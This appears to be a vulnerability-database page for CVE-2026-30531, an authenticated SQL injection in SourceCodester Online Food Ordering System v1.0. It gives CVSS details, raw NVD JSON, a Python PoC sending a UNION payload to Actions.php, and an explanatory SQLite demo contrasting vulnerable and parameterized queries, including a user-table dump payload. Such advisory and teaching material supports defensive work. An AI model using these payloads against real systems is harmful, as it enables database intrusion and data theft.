Security Vulnerability Report
CVE-2026-30531 CVSS 8.8 HIGH

CVE-2026-30531

Published: 2026-03-27 16:16:24
Last Modified: 2026-03-30 18:18:11

Description

A SQL Injection vulnerability exists in SourceCodester Online Food Ordering System v1.0 in the Actions.php file (specifically the save_category action). The application fails to properly sanitize user input supplied to the "name" parameter. This allows an authenticated attacker to inject malicious SQL commands.
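To make the weakness class concrete, the following is an added example written for this page; it is not code from the advisory, the referenced PoC or the SourceCodester project, whose actual Actions.php source is not shown here. It models a category lookup by name the way a CWE-89 bug arises, string-splicing the untrusted "name" value into the query text, beside the parameterized form, and runs a payload of the same shape as the PoC on this page against a constructed in-memory SQLite database. The `categories` and `users` tables, their columns, the three-column query and the payload texts are all assumptions made for the demonstration.

```python
import sqlite3

# Constructed in-memory schema standing in for the application's database.
# The real table layout and the query behind save_category are not shown on the
# page; everything here is an assumption made for the demonstration.
SCHEMA = """
CREATE TABLE categories (id INTEGER PRIMARY KEY, name TEXT NOT NULL, status INTEGER DEFAULT 1);
INSERT INTO categories (name) VALUES ('Pizza'), ('Burgers');
CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT NOT NULL, password TEXT NOT NULL);
INSERT INTO users (username, password) VALUES ('admin', '$2y$10$constructed-hash');
"""


def connect() -> sqlite3.Connection:
    """Fresh in-memory database seeded with the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def find_category_vulnerable(conn: sqlite3.Connection, name: str) -> list:
    """CWE-89: the attacker-controlled value is spliced into the SQL text, so a
    quote inside `name` closes the literal and the remainder is parsed as SQL."""
    sql = f"SELECT id, name, status FROM categories WHERE name = '{name}'"
    return conn.execute(sql).fetchall()


def find_category_fixed(conn: sqlite3.Connection, name: str) -> list:
    """Parameter binding: the value is sent separately from the query text and
    cannot change its structure, whatever characters it contains."""
    sql = "SELECT id, name, status FROM categories WHERE name = ?"
    return conn.execute(sql, (name,)).fetchall()


# Constructed payloads with the same shape as the PoC on this page: close the
# literal, UNION in a SELECT of matching arity, comment out the trailing quote.
# The assumed base query has three columns, so the UNION supplies three; SQLite
# has no version(), so sqlite_version() stands in for the MySQL call in the PoC.
PAYLOAD_VERSION = "x' UNION SELECT 1, sqlite_version(), 3-- -"
PAYLOAD_DUMP_USERS = "x' UNION SELECT id, username, password FROM users-- -"


def demo() -> dict:
    """Run the legitimate value and both payloads through both lookups and
    return the rows each one yields."""
    conn = connect()
    return {
        "legit_vulnerable": find_category_vulnerable(conn, "Pizza"),
        "legit_fixed": find_category_fixed(conn, "Pizza"),
        "version_vulnerable": find_category_vulnerable(conn, PAYLOAD_VERSION),
        "users_vulnerable": find_category_vulnerable(conn, PAYLOAD_DUMP_USERS),
        "users_fixed": find_category_fixed(conn, PAYLOAD_DUMP_USERS),
    }


if __name__ == "__main__":
    for label, rows in demo().items():
        print(f"{label:20s} -> {rows}")
```

Against the vulnerable lookup the user-dump payload returns the `users` row instead of a category, and the version payload returns the engine version in the `name` column; against the parameterized lookup the same strings are compared as ordinary category names and match nothing. In the real PHP application the equivalent hardening is a prepared statement with bound parameters via mysqli or PDO; escaping the value with mysqli_real_escape_string is a weaker fallback that does not protect unquoted numeric contexts.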

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:oretnom23:online_food_ordering_system:1.0:*:*:*:*:*:*:* - VULNERABLE
SourceCodester Online Food Ordering System 1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# Placeholder host; replace with the instance of Online Food Ordering System v1.0 under test
target_url = "http://target.com/Actions.php"

# The flaw is post-authentication (CVSS PR:L): supply the cookies of a valid session
cookies = {
    "PHPSESSID": "valid_session_id_here"
}

# Malicious payload to extract the database version via SQL injection.
# The 'name' parameter is vulnerable in the save_category action.
# The UNION assumes the injected query selects five columns; if the server
# returns an error or an empty body, adjust the column count to match.
payload = "test' UNION SELECT 1, version(), 3, 4, 5-- -"

data = {
    "action": "save_category",
    "name": payload
}

response = requests.post(target_url, data=data, cookies=cookies)

# A 200 only shows the request was accepted; confirm injection by checking
# whether the version string (or a database error) appears in the body.
if response.status_code == 200:
    print("[+] Payload sent successfully")
    print("[+] Response:")
    print(response.text)
else:
    print("[-] Failed to send payload")

References

https://github.com/meifukun/Web-Security-PoCs/blob/main/Online-Food-Ordering-System/SQLi-Actions-saveCategory-name.md (Exploit, Third Party Advisory)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-30531",
    "sourceIdentifier": "[email protected]",
    "published": "2026-03-27T16:16:23.687",
    "lastModified": "2026-03-30T18:18:11.070",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "A SQL Injection vulnerability exists in SourceCodester Online Food Ordering System v1.0 in the Actions.php file (specifically the save_category action). The application fails to properly sanitize user input supplied to the \"name\" parameter. This allows an authenticated attacker to inject malicious SQL commands."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 8.8,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-89"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:oretnom23:online_food_ordering_system:1.0:*:*:*:*:*:*:*",
                "matchCriteriaId": "0FAA9C4A-10ED-4AA4-8295-F4324DD2F879"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/meifukun/Web-Security-PoCs/blob/main/Online-Food-Ordering-System/SQLi-Actions-saveCategory-name.md",
        "source": "[email protected]",
        "tags": [
          "Exploit",
          "Third Party Advisory"
        ]
      }
    ]
  }
}